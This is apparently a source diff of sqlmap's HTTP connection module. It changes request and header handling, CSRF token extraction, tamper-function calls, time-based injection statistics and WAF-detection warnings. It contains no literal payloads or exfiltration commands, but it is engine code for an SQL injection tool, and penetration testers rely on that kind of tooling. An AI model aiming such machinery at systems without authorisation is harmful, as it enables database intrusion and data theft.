- return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None + elif conf.dummy or conf.murphyRate and randomInt() % conf.murphyRate == 0: + if conf.murphyRate: + time.sleep(randomInt() % (MAX_MURPHY_SLEEP_TIME + 1)) + return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None if not conf.murphyRate else randomInt(3) threadData = getCurrentThreadData() with kb.locks.request: @@ -231,25 +247,29 @@ class Connect(object): referer = kwargs.get("referer", None) or conf.referer host = kwargs.get("host", None) or conf.host direct_ = kwargs.get("direct", False) - multipart = kwargs.get("multipart", False) + multipart = kwargs.get("multipart", None) silent = kwargs.get("silent", False) raise404 = kwargs.get("raise404", True) timeout = kwargs.get("timeout", None) or conf.timeout auxHeaders = kwargs.get("auxHeaders", None) response = kwargs.get("response", False) - ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout + ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts refreshing = kwargs.get("refreshing", False) retrying = kwargs.get("retrying", False) crawling = kwargs.get("crawling", False) + checking = kwargs.get("checking", False) skipRead = kwargs.get("skipRead", False) + if multipart: + post = multipart + websocket_ = url.lower().startswith("ws") if not urlparse.urlsplit(url).netloc: url = urlparse.urljoin(conf.url, url) # flag to know if we are dealing with the same target host - target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) + target = checkSameHost(url, conf.url) if not retrying: # Reset the number of connection retries @@ -259,13 +279,17 @@ class Connect(object): # url splitted with space char while urlencoding it in the later phase url = url.replace(" ", "%20") + if "://" not in url: + url = "http://%s" % url + conn = None - code = None page = None + code = None + status = None _ = urlparse.urlsplit(url) requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) - requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url + requestMsg += getUnicode(("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling, checking)) else url) responseMsg = u"HTTP response " requestHeaders = u"" responseHeaders = None @@ -287,27 +311,13 @@ class Connect(object): params = urlencode(params) url = "%s?%s" % (url, params) - elif multipart: - # Needed in this form because of potential circle dependency - # problem (option -> update -> connect -> option) - from lib.core.option import proxyHandler - - multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) - conn = multipartOpener.open(unicodeencode(url), multipart) - page = Connect._connReadProxy(conn) if not skipRead else None - responseHeaders = conn.info() - responseHeaders[URI_HTTP_HEADER] = conn.geturl() - page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) - - return page - - elif any((refreshing, crawling)): + elif any((refreshing, crawling, checking)): pass elif target: if conf.forceSSL and urlparse.urlparse(url).scheme != "https": - url = re.sub("\Ahttp:", "https:", url, re.I) - url = re.sub(":80/", ":443/", url, re.I) + url = re.sub("(?i)\Ahttp:", "https:", url) + url = re.sub("(?i):80/", ":443/", url) if PLACE.GET in conf.parameters and not get: get = conf.parameters[PLACE.GET] @@ -335,6 +345,9 @@ class Connect(object): # Prepare HTTP headers headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}) + if HTTP_HEADER.COOKIE in headers: + cookie = headers[HTTP_HEADER.COOKIE] + if kb.authHeader: headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader @@ -350,7 +363,7 @@ class Connect(object): if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING): headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" - if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE): + if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE): headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE) if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]: @@ -362,22 +375,33 @@ class Connect(object): if boundary: headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary) + if conf.keepAlive: + headers[HTTP_HEADER.CONNECTION] = "keep-alive" + + # Reset header values to original in case of provided request file + if target and conf.requestFile: + headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie}) + if auxHeaders: - for key, item in auxHeaders.items(): + for key, value in auxHeaders.items(): for _ in headers.keys(): if _.upper() == key.upper(): del headers[_] - headers[key] = item + headers[key] = value - for key, item in headers.items(): + for key, value in headers.items(): del headers[key] - headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding) + value = unicodeencode(value, kb.pageEncoding) + for char in (r"\r", r"\n"): + value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", value) + headers[unicodeencode(key, kb.pageEncoding)] = value.strip("\r\n") url = unicodeencode(url) - post = unicodeencode(post, kb.pageEncoding) + post = unicodeencode(post) if websocket_: ws = websocket.WebSocket() + ws.settimeout(timeout) ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie) # WebSocket will add Host field of headers automatically ws.send(urldecode(post or "")) page = ws.recv() @@ -389,7 +413,7 @@ class Connect(object): responseHeaders = _(ws.getheaders()) responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()] - requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) + requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()]) requestMsg += "\n%s" % requestHeaders if post is not None: @@ -408,7 +432,7 @@ class Connect(object): else: req = urllib2.Request(url, post, headers) - requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()) + requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()]) if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj: conf.cj._policy._now = conf.cj._now = int(time.time()) @@ -420,7 +444,7 @@ class Connect(object): requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post)) if not getRequestHeader(req, HTTP_HEADER.CONNECTION): - requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION + requestHeaders += "\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive") requestMsg += "\n%s" % requestHeaders @@ -429,9 +453,18 @@ class Connect(object): requestMsg += "\n" - threadData.lastRequestMsg = requestMsg + if not multipart: + threadData.lastRequestMsg = requestMsg - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + if conf.cj: + for cookie in conf.cj: + if cookie.value is None: + cookie.value = "" + else: + for char in (r"\r", r"\n"): + cookie.value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", cookie.value) conn = urllib2.urlopen(req) @@ -446,7 +479,7 @@ class Connect(object): return conn, None, None # Get HTTP response - if hasattr(conn, 'redurl'): + if hasattr(conn, "redurl"): page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ else Connect._connReadProxy(conn)) if not skipRead else None skipLogTraffic = kb.redirectChoice == REDIRECTION.NO @@ -454,42 +487,53 @@ class Connect(object): else: page = Connect._connReadProxy(conn) if not skipRead else None - code = code or conn.code - responseHeaders = conn.info() - responseHeaders[URI_HTTP_HEADER] = conn.geturl() + if conn: + code = conn.code + responseHeaders = conn.info() + responseHeaders[URI_HTTP_HEADER] = conn.geturl() + else: + code = None + responseHeaders = {} + page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) - status = getUnicode(conn.msg) + status = getUnicode(conn.msg) if conn else None - if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing: - url = extractRegexResult(META_REFRESH_REGEX, page) + kb.connErrorCounter = 0 - debugMsg = "got HTML meta refresh header" - logger.debug(debugMsg) + if not refreshing: + refresh = responseHeaders.get(HTTP_HEADER.REFRESH, "").split("url=")[-1].strip() - if kb.alwaysRefresh is None: - msg = "sqlmap got a refresh request " - msg += "(redirect like response common to login pages). " - msg += "Do you want to apply the refresh " - msg += "from now on (or stay on the original page)? [Y/n]" - choice = readInput(msg, default="Y") + if extractRegexResult(META_REFRESH_REGEX, page): + refresh = extractRegexResult(META_REFRESH_REGEX, page) - kb.alwaysRefresh = choice not in ("n", "N") + debugMsg = "got HTML meta refresh header" + logger.debug(debugMsg) - if kb.alwaysRefresh: - if url.lower().startswith('http://'): - kwargs['url'] = url - else: - kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url + if refresh: + if kb.alwaysRefresh is None: + msg = "sqlmap got a refresh request " + msg += "(redirect like response common to login pages). " + msg += "Do you want to apply the refresh " + msg += "from now on (or stay on the original page)? [Y/n]" - threadData.lastRedirectMsg = (threadData.lastRequestUID, page) - kwargs['refreshing'] = True - kwargs['get'] = None - kwargs['post'] = None + kb.alwaysRefresh = readInput(msg, default='Y', boolean=True) - try: - return Connect._getPageProxy(**kwargs) - except SqlmapSyntaxException: - pass + if kb.alwaysRefresh: + if re.search(r"\Ahttps?://", refresh, re.I): + url = refresh + else: + url = urlparse.urljoin(url, refresh) + + threadData.lastRedirectMsg = (threadData.lastRequestUID, page) + kwargs["refreshing"] = True + kwargs["url"] = url + kwargs["get"] = None + kwargs["post"] = None + + try: + return Connect._getPageProxy(**kwargs) + except SqlmapSyntaxException: + pass # Explicit closing of connection object if conn and not conf.keepAlive: @@ -497,22 +541,25 @@ class Connect(object): if hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() - except Exception, msg: - warnMsg = "problem occurred during connection closing ('%s')" % msg + except Exception, ex: + warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex) logger.warn(warnMsg) - except urllib2.HTTPError, e: + except urllib2.HTTPError, ex: page = None responseHeaders = None + if checking: + return None, None, None + try: - page = e.read() if not skipRead else None - responseHeaders = e.info() - responseHeaders[URI_HTTP_HEADER] = e.geturl() + page = ex.read() if not skipRead else None + responseHeaders = ex.info() + responseHeaders[URI_HTTP_HEADER] = ex.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code + warnMsg += "to get error page information (%d)" % ex.code logger.warn(warnMsg) return None, None, None except KeyboardInterrupt: @@ -522,17 +569,17 @@ class Connect(object): finally: page = page if isinstance(page, unicode) else getUnicode(page) - code = e.code + code = ex.code + status = getUnicode(ex.msg) kb.originalCode = kb.originalCode or code - threadData.lastHTTPError = (threadData.lastRequestUID, code) + threadData.lastHTTPError = (threadData.lastRequestUID, code, status) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 - status = getUnicode(e.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) + logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()]) logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) @@ -543,25 +590,25 @@ class Connect(object): elif conf.verbose > 5: responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + if not multipart: + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - if e.code == httplib.UNAUTHORIZED and not conf.ignore401: + if ex.code == httplib.UNAUTHORIZED and not conf.ignore401: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise SqlmapConnectionException(errMsg) - elif e.code == httplib.NOT_FOUND: + elif ex.code == httplib.NOT_FOUND: if raise404: errMsg = "page not found (%d)" % code raise SqlmapConnectionException(errMsg) else: debugMsg = "page not found (%d)" % code singleTimeLogMessage(debugMsg, logging.DEBUG) - processResponse(page, responseHeaders) - elif e.code == httplib.GATEWAY_TIMEOUT: + elif ex.code == httplib.GATEWAY_TIMEOUT: if ignoreTimeout: - return None, None, None + return None if not conf.ignoreTimeouts else "", None, None else: - warnMsg = "unable to connect to the target URL (%d - %s)" % (e.code, httplib.responses[e.code]) + warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code]) if threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" logger.critical(warnMsg) @@ -575,22 +622,46 @@ class Connect(object): debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg) - except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e: + except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError): tbMsg = traceback.format_exc() - if "no host given" in tbMsg: + if checking: + return None, None, None + elif "no host given" in tbMsg: warnMsg = "invalid URL address used (%s)" % repr(url) raise SqlmapSyntaxException(warnMsg) elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg: warnMsg = "connection was forcibly closed by the target URL" elif "timed out" in tbMsg: + if not conf.disablePrecon: + singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)") + conf.disablePrecon = True + + if kb.testMode and kb.testType not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): + kb.responseTimes.clear() + if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): - singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests") + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests") + kb.droppingRequests = True warnMsg = "connection timed out to the target URL" + elif "Connection reset" in tbMsg: + if not conf.disablePrecon: + singleTimeWarnMessage("turning off pre-connect mechanism because of connection reset(s)") + conf.disablePrecon = True + + if kb.testMode: + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is resetting 'suspicious' requests") + kb.droppingRequests = True + warnMsg = "connection reset to the target URL" elif "URLError" in tbMsg or "error" in tbMsg: warnMsg = "unable to connect to the target URL" + match = re.search(r"Errno \d+\] ([^>]+)", tbMsg) + if match: + warnMsg += " ('%s')" % match.group(1).strip() elif "NTLM" in tbMsg: warnMsg = "there has been a problem with NTLM authentication" + elif "Invalid header name" in tbMsg: # (e.g. PostgreSQL ::Text payload) + return None, None, None elif "BadStatusLine" in tbMsg: warnMsg = "connection dropped or unknown HTTP " warnMsg += "status code received" @@ -607,19 +678,37 @@ class Connect(object): else: warnMsg = "unable to connect to the target URL" - if "BadStatusLine" not in tbMsg: + if "BadStatusLine" not in tbMsg and any((conf.proxy, conf.tor)): warnMsg += " or proxy" if silent: return None, None, None - elif "forcibly closed" in tbMsg: + + with kb.locks.connError: + kb.connErrorCounter += 1 + + if kb.connErrorCounter >= MAX_CONSECUTIVE_CONNECTION_ERRORS and kb.connErrorChoice is None: + message = "there seems to be a continuous problem with connection to the target. " + message += "Are you sure that you want to continue " + message += "with further target testing? [y/N] " + + kb.connErrorChoice = readInput(message, default='N', boolean=True) + + if kb.connErrorChoice is False: + raise SqlmapConnectionException(warnMsg) + + if "forcibly closed" in tbMsg: logger.critical(warnMsg) return None, None, None elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead")): - return None, None, None + return None if not conf.ignoreTimeouts else "", None, None elif threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" - logger.critical(warnMsg) + if not retrying: + warnMsg += "(s)" + logger.critical(warnMsg) + else: + logger.debug(warnMsg) return Connect._retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) @@ -628,19 +717,19 @@ class Connect(object): raise SqlmapConnectionException(warnMsg) finally: - if not isinstance(page, unicode): + if isinstance(page, basestring) and not isinstance(page, unicode): if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]): page = unicode(page, errors="ignore") else: page = getUnicode(page) socket.setdefaulttimeout(conf.timeout) - processResponse(page, responseHeaders) + processResponse(page, responseHeaders, status) if conn and getattr(conn, "redurl", None): _ = urlparse.urlsplit(conn.redurl) _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) - requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % re.escape(getUnicode(_)), requestMsg, 1) + requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1) if kb.resendPostOnRedirect is False: requestMsg = re.sub("(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg) @@ -652,7 +741,7 @@ class Connect(object): responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) + logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()]) if not skipLogTraffic: logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) @@ -662,7 +751,8 @@ class Connect(object): elif conf.verbose > 5: responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + if not multipart: + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) return page, responseHeaders, code @@ -718,7 +808,7 @@ class Connect(object): payload = function(payload=payload, headers=auxHeaders) except Exception, ex: errMsg = "error occurred while running tamper " - errMsg += "function '%s' ('%s')" % (function.func_name, ex) + errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex)) raise SqlmapGenericException(errMsg) if not isinstance(payload, basestring): @@ -728,7 +818,7 @@ class Connect(object): value = agent.replacePayload(value, payload) - logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) + logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\')) if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): @@ -750,9 +840,20 @@ class Connect(object): value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded - if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode: - payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below - value = agent.replacePayload(value, payload) + if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode: + skip = False + + if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE: + if kb.cookieEncodeChoice is None: + msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282 + choice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N') + kb.cookieEncodeChoice = choice.upper().strip() == 'Y' + if not kb.cookieEncodeChoice: + skip = True + + if not skip: + payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below + value = agent.replacePayload(value, payload) if conf.hpp: if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): @@ -789,9 +890,13 @@ class Connect(object): if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value + elif place == PLACE.GET: # Note: for (e.g.) checkWaf() when there are no GET parameters + get = value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value + elif place == PLACE.POST: + post = value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value @@ -815,30 +920,41 @@ class Connect(object): uri = conf.url if value and place == PLACE.CUSTOM_HEADER: - auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] + if value.split(',')[0].capitalize() == PLACE.COOKIE: + cookie = value.split(',', 1)[1] + else: + auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] if conf.csrfToken: def _adjustParameter(paramString, parameter, newValue): retVal = paramString - match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString) + match = re.search("%s=[^&]*" % re.escape(parameter), paramString) if match: - retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString) + retVal = re.sub(re.escape(match.group(0)), "%s=%s" % (parameter, newValue), paramString) + else: + match = re.search("(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString) + if match: + retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString) return retVal page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST)) match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "") token = (match.group(2) or match.group(3) or match.group(4)) if match else None + if not token: + match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "") + token = match.group(1) if match else None + if not token: if conf.csrfUrl != conf.url and code == httplib.OK: if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): token = page - if not token and any(_.name == conf.csrfToken for _ in conf.cj): + if not token and conf.cj and any(_.name == conf.csrfToken for _ in conf.cj): for _ in conf.cj: if _.name == conf.csrfToken: token = _.value - if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): + if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): if post: post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token) elif get: @@ -889,11 +1005,16 @@ class Connect(object): if conf.evalCode: delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER - variables = {"uri": uri} + variables = {"uri": uri, "lastPage": threadData.lastPage, "_locals": locals()} originals = {} keywords = keyword.kwlist - for item in filter(None, (get, post if not kb.postHint else None)): + if not get and PLACE.URI in conf.parameters: + query = urlparse.urlsplit(uri).query or "" + else: + query = None + + for item in filter(None, (get, post if not kb.postHint else None, query)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) @@ -915,18 +1036,21 @@ class Connect(object): while True: try: - compiler.parse(conf.evalCode.replace(';', '\n')) + compiler.parse(unicodeencode(conf.evalCode.replace(';', '\n'))) except SyntaxError, ex: - original = replacement = ex.text.strip() - for _ in re.findall(r"[A-Za-z_]+", original)[::-1]: - if _ in keywords: - replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX)) + if ex.text: + original = replacement = ex.text.strip() + for _ in re.findall(r"[A-Za-z_]+", original)[::-1]: + if _ in keywords: + replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX)) + break + if original == replacement: + conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "") break - if original == replacement: - conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "") - break + else: + conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement) else: - conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement) + break else: break @@ -945,16 +1069,34 @@ class Connect(object): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): found = False - value = unicode(value) + value = getUnicode(value, UNICODE_ENCODING) + + if kb.postHint and re.search(r"\b%s\b" % re.escape(name), post or ""): + if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP): + if re.search(r"<%s\b" % re.escape(name), post): + found = True + post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value, post) + elif re.search(r"\b%s>" % re.escape(name), post): + found = True + post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value, post) + + regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name) + if not found and re.search(regex, (post or "")): + found = True + post = re.sub(regex, "\g<1>\g<2>%s" % value, post) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter)) + if not found and re.search(regex, (post or "")): + found = True + post = re.sub(regex, "\g<1>%s\g<3>" % value, post) + if re.search(regex, (get or "")): found = True get = re.sub(regex, "\g<1>%s\g<3>" % value, get) - if re.search(regex, (post or "")): + if re.search(regex, (query or "")): found = True - post = re.sub(regex, "\g<1>%s\g<3>" % value, post) + uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value, uri) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)) if re.search(regex, (cookie or "")): @@ -978,35 +1120,38 @@ class Connect(object): elif kb.postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) - if timeBasedCompare: - if len(kb.responseTimes) < MIN_TIME_RESPONSES: + if timeBasedCompare and not conf.disableStats: + if len(kb.responseTimes.get(kb.responseTimeMode, [])) < MIN_TIME_RESPONSES: clearConsoleLine() + kb.responseTimes.setdefault(kb.responseTimeMode, []) + if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) - warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime("%X") + warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "") warnMsg += "larger statistical model, please wait" dataToStdout(warnMsg) - while len(kb.responseTimes) < MIN_TIME_RESPONSES: - Connect.queryPage(content=True) + while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: + value = kb.responseTimePayload.replace(RANDOM_INTEGER_MARKER, str(randomInt(6))).replace(RANDOM_STRING_MARKER, randomStr()) if kb.responseTimePayload else kb.responseTimePayload + Connect.queryPage(value=value, content=True, raise404=False) dataToStdout('.') - dataToStdout("\n") + dataToStdout(" (done)\n") elif not kb.testMode: - warnMsg = "it is very important not to stress the network adapter " + warnMsg = "it is very important to not stress the network connection " warnMsg += "during usage of time-based payloads to prevent potential " - warnMsg += "errors " + warnMsg += "disruptions " singleTimeWarnMessage(warnMsg) if not kb.laggingChecked: kb.laggingChecked = True - deviation = stdev(kb.responseTimes) + deviation = stdev(kb.responseTimes[kb.responseTimeMode]) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE @@ -1042,9 +1187,9 @@ class Connect(object): _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) if headers: - if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers: + if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) - elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers: + elif 